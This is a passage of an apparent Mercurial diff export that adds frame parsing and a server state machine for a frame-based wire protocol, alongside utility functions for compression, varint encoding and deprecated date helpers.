4163 dobj = self._dctx.decompressobj()
4156 chunks = []
4164 chunks = []
4157 pos = 0
4165 pos = 0
4158 while pos < insize:
4166 while pos < insize:
4159 pos2 = pos + self._decompinsize
4167 pos2 = pos + self._decompinsize
4160 chunk = dobj.decompress(data[pos:pos2])
4168 chunk = dobj.decompress(data[pos:pos2])
4161 if chunk:
4169 if chunk:
4162 chunks.append(chunk)
4170 chunks.append(chunk)
4163 pos = pos2
4171 pos = pos2
4164 # Frame should be exhausted, so no finish() API.
4172 # Frame should be exhausted, so no finish() API.
4165
4173
4166 return ''.join(chunks)
4174 return ''.join(chunks)
4167 except Exception as e:
4175 except Exception as e:
4168 raise error.RevlogError(_('revlog decompress error: %s') %
4176 raise error.RevlogError(_('revlog decompress error: %s') %
4169 forcebytestr(e))
4177 forcebytestr(e))
4170
4178
4171 def revlogcompressor(self, opts=None):
4179 def revlogcompressor(self, opts=None):
4172 opts = opts or {}
4180 opts = opts or {}
4173 return self.zstdrevlogcompressor(self._module,
4181 return self.zstdrevlogcompressor(self._module,
4174 level=opts.get('level', 3))
4182 level=opts.get('level', 3))
4175
4183
4176 compengines.register(_zstdengine())
4184 compengines.register(_zstdengine())
4177
4185
4178 def bundlecompressiontopics():
4186 def bundlecompressiontopics():
4179 """Obtains a list of available bundle compressions for use in help."""
4187 """Obtains a list of available bundle compressions for use in help."""
4180 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
4188 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
4181 items = {}
4189 items = {}
4182
4190
4183 # We need to format the docstring. So use a dummy object/type to hold it
4191 # We need to format the docstring. So use a dummy object/type to hold it
4184 # rather than mutating the original.
4192 # rather than mutating the original.
4185 class docobject(object):
4193 class docobject(object):
4186 pass
4194 pass
4187
4195
4188 for name in compengines:
4196 for name in compengines:
4189 engine = compengines[name]
4197 engine = compengines[name]
4190
4198
4191 if not engine.available():
4199 if not engine.available():
4192 continue
4200 continue
4193
4201
4194 bt = engine.bundletype()
4202 bt = engine.bundletype()
4195 if not bt or not bt[0]:
4203 if not bt or not bt[0]:
4196 continue
4204 continue
4197
4205
4198 doc = pycompat.sysstr('``%s``\n %s') % (
4206 doc = pycompat.sysstr('``%s``\n %s') % (
4199 bt[0], engine.bundletype.__doc__)
4207 bt[0], engine.bundletype.__doc__)
4200
4208
4201 value = docobject()
4209 value = docobject()
4202 value.__doc__ = doc
4210 value.__doc__ = doc
4203 value._origdoc = engine.bundletype.__doc__
4211 value._origdoc = engine.bundletype.__doc__
4204 value._origfunc = engine.bundletype
4212 value._origfunc = engine.bundletype
4205
4213
4206 items[bt[0]] = value
4214 items[bt[0]] = value
4207
4215
4208 return items
4216 return items
4209
4217
4210 i18nfunctions = bundlecompressiontopics().values()
4218 i18nfunctions = bundlecompressiontopics().values()
4211
4219
4212 # convenient shortcut
4220 # convenient shortcut
4213 dst = debugstacktrace
4221 dst = debugstacktrace
4214
4222
4215 def safename(f, tag, ctx, others=None):
4223 def safename(f, tag, ctx, others=None):
4216 """
4224 """
4217 Generate a name that it is safe to rename f to in the given context.
4225 Generate a name that it is safe to rename f to in the given context.
4218
4226
4219 f: filename to rename
4227 f: filename to rename
4220 tag: a string tag that will be included in the new name
4228 tag: a string tag that will be included in the new name
4221 ctx: a context, in which the new name must not exist
4229 ctx: a context, in which the new name must not exist
4222 others: a set of other filenames that the new name must not be in
4230 others: a set of other filenames that the new name must not be in
4223
4231
4224 Returns a file name of the form oldname~tag[~number] which does not exist
4232 Returns a file name of the form oldname~tag[~number] which does not exist
4225 in the provided context and is not in the set of other names.
4233 in the provided context and is not in the set of other names.
4226 """
4234 """
4227 if others is None:
4235 if others is None:
4228 others = set()
4236 others = set()
4229
4237
4230 fn = '%s~%s' % (f, tag)
4238 fn = '%s~%s' % (f, tag)
4231 if fn not in ctx and fn not in others:
4239 if fn not in ctx and fn not in others:
4232 return fn
4240 return fn
4233 for n in itertools.count(1):
4241 for n in itertools.count(1):
4234 fn = '%s~%s~%s' % (f, tag, n)
4242 fn = '%s~%s~%s' % (f, tag, n)
4235 if fn not in ctx and fn not in others:
4243 if fn not in ctx and fn not in others:
4236 return fn
4244 return fn
4237
4245
4238 def readexactly(stream, n):
4246 def readexactly(stream, n):
4239 '''read n bytes from stream.read and abort if less was available'''
4247 '''read n bytes from stream.read and abort if less was available'''
4240 s = stream.read(n)
4248 s = stream.read(n)
4241 if len(s) < n:
4249 if len(s) < n:
4242 raise error.Abort(_("stream ended unexpectedly"
4250 raise error.Abort(_("stream ended unexpectedly"
4243 " (got %d bytes, expected %d)")
4251 " (got %d bytes, expected %d)")
4244 % (len(s), n))
4252 % (len(s), n))
4245 return s
4253 return s
4246
4254
4247 def uvarintencode(value):
4255 def uvarintencode(value):
4248 """Encode an unsigned integer value to a varint.
4256 """Encode an unsigned integer value to a varint.
4249
4257
4250 A varint is a variable length integer of 1 or more bytes. Each byte
4258 A varint is a variable length integer of 1 or more bytes. Each byte
4251 except the last has the most significant bit set. The lower 7 bits of
4259 except the last has the most significant bit set. The lower 7 bits of
4252 each byte store the 2's complement representation, least significant group
4260 each byte store the 2's complement representation, least significant group
4253 first.
4261 first.
4254
4262
4255 >>> uvarintencode(0)
4263 >>> uvarintencode(0)
4256 '\\x00'
4264 '\\x00'
4257 >>> uvarintencode(1)
4265 >>> uvarintencode(1)
4258 '\\x01'
4266 '\\x01'
4259 >>> uvarintencode(127)
4267 >>> uvarintencode(127)
4260 '\\x7f'
4268 '\\x7f'
4261 >>> uvarintencode(1337)
4269 >>> uvarintencode(1337)
4262 '\\xb9\\n'
4270 '\\xb9\\n'
4263 >>> uvarintencode(65536)
4271 >>> uvarintencode(65536)
4264 '\\x80\\x80\\x04'
4272 '\\x80\\x80\\x04'
4265 >>> uvarintencode(-1)
4273 >>> uvarintencode(-1)
4266 Traceback (most recent call last):
4274 Traceback (most recent call last):
4267 ...
4275 ...
4268 ProgrammingError: negative value for uvarint: -1
4276 ProgrammingError: negative value for uvarint: -1
4269 """
4277 """
4270 if value < 0:
4278 if value < 0:
4271 raise error.ProgrammingError('negative value for uvarint: %d'
4279 raise error.ProgrammingError('negative value for uvarint: %d'
4272 % value)
4280 % value)
4273 bits = value & 0x7f
4281 bits = value & 0x7f
4274 value >>= 7
4282 value >>= 7
4275 bytes = []
4283 bytes = []
4276 while value:
4284 while value:
4277 bytes.append(pycompat.bytechr(0x80 | bits))
4285 bytes.append(pycompat.bytechr(0x80 | bits))
4278 bits = value & 0x7f
4286 bits = value & 0x7f
4279 value >>= 7
4287 value >>= 7
4280 bytes.append(pycompat.bytechr(bits))
4288 bytes.append(pycompat.bytechr(bits))
4281
4289
4282 return ''.join(bytes)
4290 return ''.join(bytes)
4283
4291
4284 def uvarintdecodestream(fh):
4292 def uvarintdecodestream(fh):
4285 """Decode an unsigned variable length integer from a stream.
4293 """Decode an unsigned variable length integer from a stream.
4286
4294
4287 The passed argument is anything that has a ``.read(N)`` method.
4295 The passed argument is anything that has a ``.read(N)`` method.
4288
4296
4289 >>> try:
4297 >>> try:
4290 ... from StringIO import StringIO as BytesIO
4298 ... from StringIO import StringIO as BytesIO
4291 ... except ImportError:
4299 ... except ImportError:
4292 ... from io import BytesIO
4300 ... from io import BytesIO
4293 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4301 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4294 0
4302 0
4295 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4303 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4296 1
4304 1
4297 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4305 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4298 127
4306 127
4299 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4307 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4300 1337
4308 1337
4301 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4309 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4302 65536
4310 65536
4303 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4311 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4304 Traceback (most recent call last):
4312 Traceback (most recent call last):
4305 ...
4313 ...
4306 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4314 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4307 """
4315 """
4308 result = 0
4316 result = 0
4309 shift = 0
4317 shift = 0
4310 while True:
4318 while True:
4311 byte = ord(readexactly(fh, 1))
4319 byte = ord(readexactly(fh, 1))
4312 result |= ((byte & 0x7f) << shift)
4320 result |= ((byte & 0x7f) << shift)
4313 if not (byte & 0x80):
4321 if not (byte & 0x80):
4314 return result
4322 return result
4315 shift += 7
4323 shift += 7
4316
4324
4317 ###
4325 ###
4318 # Deprecation warnings for util.py splitting
4326 # Deprecation warnings for util.py splitting
4319 ###
4327 ###
4320
4328
4321 defaultdateformats = dateutil.defaultdateformats
4329 defaultdateformats = dateutil.defaultdateformats
4322
4330
4323 extendeddateformats = dateutil.extendeddateformats
4331 extendeddateformats = dateutil.extendeddateformats
4324
4332
4325 def makedate(*args, **kwargs):
4333 def makedate(*args, **kwargs):
4326 msg = ("'util.makedate' is deprecated, "
4334 msg = ("'util.makedate' is deprecated, "
4327 "use 'utils.dateutil.makedate'")
4335 "use 'utils.dateutil.makedate'")
4328 nouideprecwarn(msg, "4.6")
4336 nouideprecwarn(msg, "4.6")
4329 return dateutil.makedate(*args, **kwargs)
4337 return dateutil.makedate(*args, **kwargs)
4330
4338
4331 def datestr(*args, **kwargs):
4339 def datestr(*args, **kwargs):
4332 msg = ("'util.datestr' is deprecated, "
4340 msg = ("'util.datestr' is deprecated, "
4333 "use 'utils.dateutil.datestr'")
4341 "use 'utils.dateutil.datestr'")
4334 nouideprecwarn(msg, "4.6")
4342 nouideprecwarn(msg, "4.6")
4335 return dateutil.datestr(*args, **kwargs)
4343 return dateutil.datestr(*args, **kwargs)
4336
4344
4337 def shortdate(*args, **kwargs):
4345 def shortdate(*args, **kwargs):
4338 msg = ("'util.shortdate' is deprecated, "
4346 msg = ("'util.shortdate' is deprecated, "
4339 "use 'utils.dateutil.shortdate'")
4347 "use 'utils.dateutil.shortdate'")
4340 nouideprecwarn(msg, "4.6")
4348 nouideprecwarn(msg, "4.6")
4341 return dateutil.shortdate(*args, **kwargs)
4349 return dateutil.shortdate(*args, **kwargs)
4342
4350
4343 def parsetimezone(*args, **kwargs):
4351 def parsetimezone(*args, **kwargs):
4344 msg = ("'util.parsetimezone' is deprecated, "
4352 msg = ("'util.parsetimezone' is deprecated, "
4345 "use 'utils.dateutil.parsetimezone'")
4353 "use 'utils.dateutil.parsetimezone'")
4346 nouideprecwarn(msg, "4.6")
4354 nouideprecwarn(msg, "4.6")
4347 return dateutil.parsetimezone(*args, **kwargs)
4355 return dateutil.parsetimezone(*args, **kwargs)
4348
4356
4349 def strdate(*args, **kwargs):
4357 def strdate(*args, **kwargs):
4350 msg = ("'util.strdate' is deprecated, "
4358 msg = ("'util.strdate' is deprecated, "
4351 "use 'utils.dateutil.strdate'")
4359 "use 'utils.dateutil.strdate'")
4352 nouideprecwarn(msg, "4.6")
4360 nouideprecwarn(msg, "4.6")
4353 return dateutil.strdate(*args, **kwargs)
4361 return dateutil.strdate(*args, **kwargs)
4354
4362
4355 def parsedate(*args, **kwargs):
4363 def parsedate(*args, **kwargs):
4356 msg = ("'util.parsedate' is deprecated, "
4364 msg = ("'util.parsedate' is deprecated, "
4357 "use 'utils.dateutil.parsedate'")
4365 "use 'utils.dateutil.parsedate'")
4358 nouideprecwarn(msg, "4.6")
4366 nouideprecwarn(msg, "4.6")
4359 return dateutil.parsedate(*args, **kwargs)
4367 return dateutil.parsedate(*args, **kwargs)
4360
4368
4361 def matchdate(*args, **kwargs):
4369 def matchdate(*args, **kwargs):
4362 msg = ("'util.matchdate' is deprecated, "
4370 msg = ("'util.matchdate' is deprecated, "
4363 "use 'utils.dateutil.matchdate'")
4371 "use 'utils.dateutil.matchdate'")
4364 nouideprecwarn(msg, "4.6")
4372 nouideprecwarn(msg, "4.6")
4365 return dateutil.matchdate(*args, **kwargs)
4373 return dateutil.matchdate(*args, **kwargs)
@@ -1,156 +1,395 b''
1 # wireprotoframing.py - unified framing protocol for wire protocol
1 # wireprotoframing.py - unified framing protocol for wire protocol
2 #
2 #
3 # Copyright 2018 Gregory Szorc <gregory.szorc@gmail.com>
3 # Copyright 2018 Gregory Szorc <gregory.szorc@gmail.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 # This file contains functionality to support the unified frame-based wire
8 # This file contains functionality to support the unified frame-based wire
9 # protocol. For details about the protocol, see
9 # protocol. For details about the protocol, see
10 # `hg help internals.wireprotocol`.
10 # `hg help internals.wireprotocol`.
11
11
12 from __future__ import absolute_import
12 from __future__ import absolute_import
13
13
14 import struct
14 import struct
15
15
16 from .i18n import _
16 from . import (
17 from . import (
18 error,
17 util,
19 util,
18 )
20 )
19
21
20 FRAME_HEADER_SIZE = 4
22 FRAME_HEADER_SIZE = 4
21 DEFAULT_MAX_FRAME_SIZE = 32768
23 DEFAULT_MAX_FRAME_SIZE = 32768
22
24
23 FRAME_TYPE_COMMAND_NAME = 0x01
25 FRAME_TYPE_COMMAND_NAME = 0x01
24 FRAME_TYPE_COMMAND_ARGUMENT = 0x02
26 FRAME_TYPE_COMMAND_ARGUMENT = 0x02
25 FRAME_TYPE_COMMAND_DATA = 0x03
27 FRAME_TYPE_COMMAND_DATA = 0x03
26
28
27 FRAME_TYPES = {
29 FRAME_TYPES = {
28 b'command-name': FRAME_TYPE_COMMAND_NAME,
30 b'command-name': FRAME_TYPE_COMMAND_NAME,
29 b'command-argument': FRAME_TYPE_COMMAND_ARGUMENT,
31 b'command-argument': FRAME_TYPE_COMMAND_ARGUMENT,
30 b'command-data': FRAME_TYPE_COMMAND_DATA,
32 b'command-data': FRAME_TYPE_COMMAND_DATA,
31 }
33 }
32
34
33 FLAG_COMMAND_NAME_EOS = 0x01
35 FLAG_COMMAND_NAME_EOS = 0x01
34 FLAG_COMMAND_NAME_HAVE_ARGS = 0x02
36 FLAG_COMMAND_NAME_HAVE_ARGS = 0x02
35 FLAG_COMMAND_NAME_HAVE_DATA = 0x04
37 FLAG_COMMAND_NAME_HAVE_DATA = 0x04
36
38
37 FLAGS_COMMAND = {
39 FLAGS_COMMAND = {
38 b'eos': FLAG_COMMAND_NAME_EOS,
40 b'eos': FLAG_COMMAND_NAME_EOS,
39 b'have-args': FLAG_COMMAND_NAME_HAVE_ARGS,
41 b'have-args': FLAG_COMMAND_NAME_HAVE_ARGS,
40 b'have-data': FLAG_COMMAND_NAME_HAVE_DATA,
42 b'have-data': FLAG_COMMAND_NAME_HAVE_DATA,
41 }
43 }
42
44
43 FLAG_COMMAND_ARGUMENT_CONTINUATION = 0x01
45 FLAG_COMMAND_ARGUMENT_CONTINUATION = 0x01
44 FLAG_COMMAND_ARGUMENT_EOA = 0x02
46 FLAG_COMMAND_ARGUMENT_EOA = 0x02
45
47
46 FLAGS_COMMAND_ARGUMENT = {
48 FLAGS_COMMAND_ARGUMENT = {
47 b'continuation': FLAG_COMMAND_ARGUMENT_CONTINUATION,
49 b'continuation': FLAG_COMMAND_ARGUMENT_CONTINUATION,
48 b'eoa': FLAG_COMMAND_ARGUMENT_EOA,
50 b'eoa': FLAG_COMMAND_ARGUMENT_EOA,
49 }
51 }
50
52
51 FLAG_COMMAND_DATA_CONTINUATION = 0x01
53 FLAG_COMMAND_DATA_CONTINUATION = 0x01
52 FLAG_COMMAND_DATA_EOS = 0x02
54 FLAG_COMMAND_DATA_EOS = 0x02
53
55
54 FLAGS_COMMAND_DATA = {
56 FLAGS_COMMAND_DATA = {
55 b'continuation': FLAG_COMMAND_DATA_CONTINUATION,
57 b'continuation': FLAG_COMMAND_DATA_CONTINUATION,
56 b'eos': FLAG_COMMAND_DATA_EOS,
58 b'eos': FLAG_COMMAND_DATA_EOS,
57 }
59 }
58
60
59 # Maps frame types to their available flags.
61 # Maps frame types to their available flags.
60 FRAME_TYPE_FLAGS = {
62 FRAME_TYPE_FLAGS = {
61 FRAME_TYPE_COMMAND_NAME: FLAGS_COMMAND,
63 FRAME_TYPE_COMMAND_NAME: FLAGS_COMMAND,
62 FRAME_TYPE_COMMAND_ARGUMENT: FLAGS_COMMAND_ARGUMENT,
64 FRAME_TYPE_COMMAND_ARGUMENT: FLAGS_COMMAND_ARGUMENT,
63 FRAME_TYPE_COMMAND_DATA: FLAGS_COMMAND_DATA,
65 FRAME_TYPE_COMMAND_DATA: FLAGS_COMMAND_DATA,
64 }
66 }
65
67
66 ARGUMENT_FRAME_HEADER = struct.Struct(r'<HH')
68 ARGUMENT_FRAME_HEADER = struct.Struct(r'<HH')
67
69
68 def makeframe(frametype, frameflags, payload):
70 def makeframe(frametype, frameflags, payload):
69 """Assemble a frame into a byte array."""
71 """Assemble a frame into a byte array."""
70 # TODO assert size of payload.
72 # TODO assert size of payload.
71 frame = bytearray(FRAME_HEADER_SIZE + len(payload))
73 frame = bytearray(FRAME_HEADER_SIZE + len(payload))
72
74
73 l = struct.pack(r'<I', len(payload))
75 l = struct.pack(r'<I', len(payload))
74 frame[0:3] = l[0:3]
76 frame[0:3] = l[0:3]
75 frame[3] = (frametype << 4) | frameflags
77 frame[3] = (frametype << 4) | frameflags
76 frame[4:] = payload
78 frame[4:] = payload
77
79
78 return frame
80 return frame
79
81
80 def makeframefromhumanstring(s):
82 def makeframefromhumanstring(s):
81 """Given a string of the form: <type> <flags> <payload>, creates a frame.
83 """Given a string of the form: <type> <flags> <payload>, creates a frame.
82
84
83 This can be used by user-facing applications and tests for creating
85 This can be used by user-facing applications and tests for creating
84 frames easily without having to type out a bunch of constants.
86 frames easily without having to type out a bunch of constants.
85
87
86 Frame type and flags can be specified by integer or named constant.
88 Frame type and flags can be specified by integer or named constant.
87 Flags can be delimited by `|` to bitwise OR them together.
89 Flags can be delimited by `|` to bitwise OR them together.
88 """
90 """
89 frametype, frameflags, payload = s.split(b' ', 2)
91 frametype, frameflags, payload = s.split(b' ', 2)
90
92
91 if frametype in FRAME_TYPES:
93 if frametype in FRAME_TYPES:
92 frametype = FRAME_TYPES[frametype]
94 frametype = FRAME_TYPES[frametype]
93 else:
95 else:
94 frametype = int(frametype)
96 frametype = int(frametype)
95
97
96 finalflags = 0
98 finalflags = 0
97 validflags = FRAME_TYPE_FLAGS[frametype]
99 validflags = FRAME_TYPE_FLAGS[frametype]
98 for flag in frameflags.split(b'|'):
100 for flag in frameflags.split(b'|'):
99 if flag in validflags:
101 if flag in validflags:
100 finalflags |= validflags[flag]
102 finalflags |= validflags[flag]
101 else:
103 else:
102 finalflags |= int(flag)
104 finalflags |= int(flag)
103
105
104 payload = util.unescapestr(payload)
106 payload = util.unescapestr(payload)
105
107
106 return makeframe(frametype, finalflags, payload)
108 return makeframe(frametype, finalflags, payload)
107
109
110 def parseheader(data):
111 """Parse a unified framing protocol frame header from a buffer.
112
113 The header is expected to be in the buffer at offset 0 and the
114 buffer is expected to be large enough to hold a full header.
115 """
116 # 24 bits payload length (little endian)
117 # 4 bits frame type
118 # 4 bits frame flags
119 # ... payload
120 framelength = data[0] + 256 * data[1] + 16384 * data[2]
121 typeflags = data[3]
122
123 frametype = (typeflags & 0xf0) >> 4
124 frameflags = typeflags & 0x0f
125
126 return frametype, frameflags, framelength
127
128 def readframe(fh):
129 """Read a unified framing protocol frame from a file object.
130
131 Returns a 3-tuple of (type, flags, payload) for the decoded frame or
132 None if no frame is available. May raise if a malformed frame is
133 seen.
134 """
135 header = bytearray(FRAME_HEADER_SIZE)
136
137 readcount = fh.readinto(header)
138
139 if readcount == 0:
140 return None
141
142 if readcount != FRAME_HEADER_SIZE:
143 raise error.Abort(_('received incomplete frame: got %d bytes: %s') %
144 (readcount, header))
145
146 frametype, frameflags, framelength = parseheader(header)
147
148 payload = fh.read(framelength)
149 if len(payload) != framelength:
150 raise error.Abort(_('frame length error: expected %d; got %d') %
151 (framelength, len(payload)))
152
153 return frametype, frameflags, payload
154
108 def createcommandframes(cmd, args, datafh=None):
155 def createcommandframes(cmd, args, datafh=None):
109 """Create frames necessary to transmit a request to run a command.
156 """Create frames necessary to transmit a request to run a command.
110
157
111 This is a generator of bytearrays. Each item represents a frame
158 This is a generator of bytearrays. Each item represents a frame
112 ready to be sent over the wire to a peer.
159 ready to be sent over the wire to a peer.
113 """
160 """
114 flags = 0
161 flags = 0
115 if args:
162 if args:
116 flags |= FLAG_COMMAND_NAME_HAVE_ARGS
163 flags |= FLAG_COMMAND_NAME_HAVE_ARGS
117 if datafh:
164 if datafh:
118 flags |= FLAG_COMMAND_NAME_HAVE_DATA
165 flags |= FLAG_COMMAND_NAME_HAVE_DATA
119
166
120 if not flags:
167 if not flags:
121 flags |= FLAG_COMMAND_NAME_EOS
168 flags |= FLAG_COMMAND_NAME_EOS
122
169
123 yield makeframe(FRAME_TYPE_COMMAND_NAME, flags, cmd)
170 yield makeframe(FRAME_TYPE_COMMAND_NAME, flags, cmd)
124
171
125 for i, k in enumerate(sorted(args)):
172 for i, k in enumerate(sorted(args)):
126 v = args[k]
173 v = args[k]
127 last = i == len(args) - 1
174 last = i == len(args) - 1
128
175
129 # TODO handle splitting of argument values across frames.
176 # TODO handle splitting of argument values across frames.
130 payload = bytearray(ARGUMENT_FRAME_HEADER.size + len(k) + len(v))
177 payload = bytearray(ARGUMENT_FRAME_HEADER.size + len(k) + len(v))
131 offset = 0
178 offset = 0
132 ARGUMENT_FRAME_HEADER.pack_into(payload, offset, len(k), len(v))
179 ARGUMENT_FRAME_HEADER.pack_into(payload, offset, len(k), len(v))
133 offset += ARGUMENT_FRAME_HEADER.size
180 offset += ARGUMENT_FRAME_HEADER.size
134 payload[offset:offset + len(k)] = k
181 payload[offset:offset + len(k)] = k
135 offset += len(k)
182 offset += len(k)
136 payload[offset:offset + len(v)] = v
183 payload[offset:offset + len(v)] = v
137
184
138 flags = FLAG_COMMAND_ARGUMENT_EOA if last else 0
185 flags = FLAG_COMMAND_ARGUMENT_EOA if last else 0
139 yield makeframe(FRAME_TYPE_COMMAND_ARGUMENT, flags, payload)
186 yield makeframe(FRAME_TYPE_COMMAND_ARGUMENT, flags, payload)
140
187
141 if datafh:
188 if datafh:
142 while True:
189 while True:
143 data = datafh.read(DEFAULT_MAX_FRAME_SIZE)
190 data = datafh.read(DEFAULT_MAX_FRAME_SIZE)
144
191
145 done = False
192 done = False
146 if len(data) == DEFAULT_MAX_FRAME_SIZE:
193 if len(data) == DEFAULT_MAX_FRAME_SIZE:
147 flags = FLAG_COMMAND_DATA_CONTINUATION
194 flags = FLAG_COMMAND_DATA_CONTINUATION
148 else:
195 else:
149 flags = FLAG_COMMAND_DATA_EOS
196 flags = FLAG_COMMAND_DATA_EOS
150 assert datafh.read(1) == b''
197 assert datafh.read(1) == b''
151 done = True
198 done = True
152
199
153 yield makeframe(FRAME_TYPE_COMMAND_DATA, flags, data)
200 yield makeframe(FRAME_TYPE_COMMAND_DATA, flags, data)
154
201
155 if done:
202 if done:
156 break
203 break
204
205 class serverreactor(object):
206 """Holds state of a server handling frame-based protocol requests.
207
208 This class is the "brain" of the unified frame-based protocol server
209 component. While the protocol is stateless from the perspective of
210 requests/commands, something needs to track which frames have been
211 received, what frames to expect, etc. This class is that thing.
212
213 Instances are modeled as a state machine of sorts. Instances are also
214 reactionary to external events. The point of this class is to encapsulate
215 the state of the connection and the exchange of frames, not to perform
216 work. Instead, callers tell this class when something occurs, like a
217 frame arriving. If that activity is worthy of a follow-up action (say
218 *run a command*), the return value of that handler will say so.
219
220 I/O and CPU intensive operations are purposefully delegated outside of
221 this class.
222
223 Consumers are expected to tell instances when events occur. They do so by
224 calling the various ``on*`` methods. These methods return a 2-tuple
225 describing any follow-up action(s) to take. The first element is the
226 name of an action to perform. The second is a data structure (usually
227 a dict) specific to that action that contains more information. e.g.
228 if the server wants to send frames back to the client, the data structure
229 will contain a reference to those frames.
230
231 Valid actions that consumers can be instructed to take are:
232
233 error
234 Indicates that an error occurred. Consumer should probably abort.
235
236 runcommand
237 Indicates that the consumer should run a wire protocol command. Details
238 of the command to run are given in the data structure.
239
240 wantframe
241 Indicates that nothing of interest happened and the server is waiting on
242 more frames from the client before anything interesting can be done.
243 """
244
245 def __init__(self):
246 self._state = 'idle'
247 self._activecommand = None
248 self._activeargs = None
249 self._activedata = None
250 self._expectingargs = None
251 self._expectingdata = None
252 self._activeargname = None
253 self._activeargchunks = None
254
255 def onframerecv(self, frametype, frameflags, payload):
256 """Process a frame that has been received off the wire.
257
258 Returns a dict with an ``action`` key that details what action,
259 if any, the consumer should take next.
260 """
261 handlers = {
262 'idle': self._onframeidle,
263 'command-receiving-args': self._onframereceivingargs,
264 'command-receiving-data': self._onframereceivingdata,
265 'errored': self._onframeerrored,
266 }
267
268 meth = handlers.get(self._state)
269 if not meth:
270 raise error.ProgrammingError('unhandled state: %s' % self._state)
271
272 return meth(frametype, frameflags, payload)
273
274 def _makeerrorresult(self, msg):
275 return 'error', {
276 'message': msg,
277 }
278
279 def _makeruncommandresult(self):
280 return 'runcommand', {
281 'command': self._activecommand,
282 'args': self._activeargs,
283 'data': self._activedata.getvalue() if self._activedata else None,
284 }
285
286 def _makewantframeresult(self):
287 return 'wantframe', {
288 'state': self._state,
289 }
290
291 def _onframeidle(self, frametype, frameflags, payload):
292 # The only frame type that should be received in this state is a
293 # command request.
294 if frametype != FRAME_TYPE_COMMAND_NAME:
295 self._state = 'errored'
296 return self._makeerrorresult(
297 _('expected command frame; got %d') % frametype)
298
299 self._activecommand = payload
300 self._activeargs = {}
301 self._activedata = None
302
303 if frameflags & FLAG_COMMAND_NAME_EOS:
304 return self._makeruncommandresult()
305
306 self._expectingargs = bool(frameflags & FLAG_COMMAND_NAME_HAVE_ARGS)
307 self._expectingdata = bool(frameflags & FLAG_COMMAND_NAME_HAVE_DATA)
308
309 if self._expectingargs:
310 self._state = 'command-receiving-args'
311 return self._makewantframeresult()
312 elif self._expectingdata:
313 self._activedata = util.bytesio()
314 self._state = 'command-receiving-data'
315 return self._makewantframeresult()
316 else:
317 self._state = 'errored'
318 return self._makeerrorresult(_('missing frame flags on '
319 'command frame'))
320
321 def _onframereceivingargs(self, frametype, frameflags, payload):
322 if frametype != FRAME_TYPE_COMMAND_ARGUMENT:
323 self._state = 'errored'
324 return self._makeerrorresult(_('expected command argument '
325 'frame; got %d') % frametype)
326
327 offset = 0
328 namesize, valuesize = ARGUMENT_FRAME_HEADER.unpack_from(payload)
329 offset += ARGUMENT_FRAME_HEADER.size
330
331 # The argument name MUST fit inside the frame.
332 argname = bytes(payload[offset:offset + namesize])
333 offset += namesize
334
335 if len(argname) != namesize:
336 self._state = 'errored'
337 return self._makeerrorresult(_('malformed argument frame: '
338 'partial argument name'))
339
340 argvalue = bytes(payload[offset:])
341
342 # Argument value spans multiple frames. Record our active state
343 # and wait for the next frame.
344 if frameflags & FLAG_COMMAND_ARGUMENT_CONTINUATION:
345 raise error.ProgrammingError('not yet implemented')
346 self._activeargname = argname
347 self._activeargchunks = [argvalue]
348 self._state = 'command-arg-continuation'
349 return self._makewantframeresult()
350
351 # Common case: the argument value is completely contained in this
352 # frame.
353
354 if len(argvalue) != valuesize:
355 self._state = 'errored'
356 return self._makeerrorresult(_('malformed argument frame: '
357 'partial argument value'))
358
359 self._activeargs[argname] = argvalue
360
361 if frameflags & FLAG_COMMAND_ARGUMENT_EOA:
362 if self._expectingdata:
363 self._state = 'command-receiving-data'
364 self._activedata = util.bytesio()
365 # TODO signal request to run a command once we don't
366 # buffer data frames.
367 return self._makewantframeresult()
368 else:
369 self._state = 'waiting'
370 return self._makeruncommandresult()
371 else:
372 return self._makewantframeresult()
373
374 def _onframereceivingdata(self, frametype, frameflags, payload):
375 if frametype != FRAME_TYPE_COMMAND_DATA:
376 self._state = 'errored'
377 return self._makeerrorresult(_('expected command data frame; '
378 'got %d') % frametype)
379
380 # TODO support streaming data instead of buffering it.
381 self._activedata.write(payload)
382
383 if frameflags & FLAG_COMMAND_DATA_CONTINUATION:
384 return self._makewantframeresult()
385 elif frameflags & FLAG_COMMAND_DATA_EOS:
386 self._activedata.seek(0)
387 self._state = 'idle'
388 return self._makeruncommandresult()
389 else:
390 self._state = 'errored'
391 return self._makeerrorresult(_('command data frame without '
392 'flags'))
393
394 def _onframeerrored(self, frametype, frameflags, payload):
395 return self._makeerrorresult(_('server already errored'))
@@ -1,833 +1,881 b''
1 # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
1 # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
2 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
2 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
3 #
3 #
4 # This software may be used and distributed according to the terms of the
4 # This software may be used and distributed according to the terms of the
5 # GNU General Public License version 2 or any later version.
5 # GNU General Public License version 2 or any later version.
6
6
7 from __future__ import absolute_import
7 from __future__ import absolute_import
8
8
9 import contextlib
9 import contextlib
10 import struct
10 import struct
11 import sys
11 import sys
12 import threading
12 import threading
13
13
14 from .i18n import _
14 from .i18n import _
15 from . import (
15 from . import (
16 encoding,
16 encoding,
17 error,
17 error,
18 hook,
18 hook,
19 pycompat,
19 pycompat,
20 util,
20 util,
21 wireproto,
21 wireproto,
22 wireprotoframing,
22 wireprototypes,
23 wireprototypes,
23 )
24 )
24
25
25 stringio = util.stringio
26 stringio = util.stringio
26
27
